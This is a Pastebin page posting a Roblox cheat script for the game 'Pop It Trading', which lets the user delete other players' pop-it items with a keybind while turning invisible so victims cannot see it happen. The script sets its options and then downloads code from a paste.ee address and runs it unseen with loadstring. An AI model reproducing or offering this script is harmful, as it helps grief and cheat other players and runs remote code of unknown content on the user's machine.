MoxieOnTop

pop it trading inventory delete

Dec 17th, 2022 (edited)
765
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.46 KB | None | 0 0
  1. getgenv().bind = "F" --keybind to delete popits near you
  2. getgenv().invis = false --turns you invis so people cant see you deleting their stuff (resetting will uninvis you)
  3. getgenv().on = true --setting this to false will stop the script
  4. getgenv().IgnoredList = { --ignored people (script won't delete popits from these people)
  5. "Person1",
  6. "Person2",
  7. "Person3"
  8. }
  9.  
  10. local domain = "paste.ee"
  11. loadstring(game:HttpGet("https://"..domain.."/r/WFYpr/0"))()
Add Comment
Please, Sign In to add comment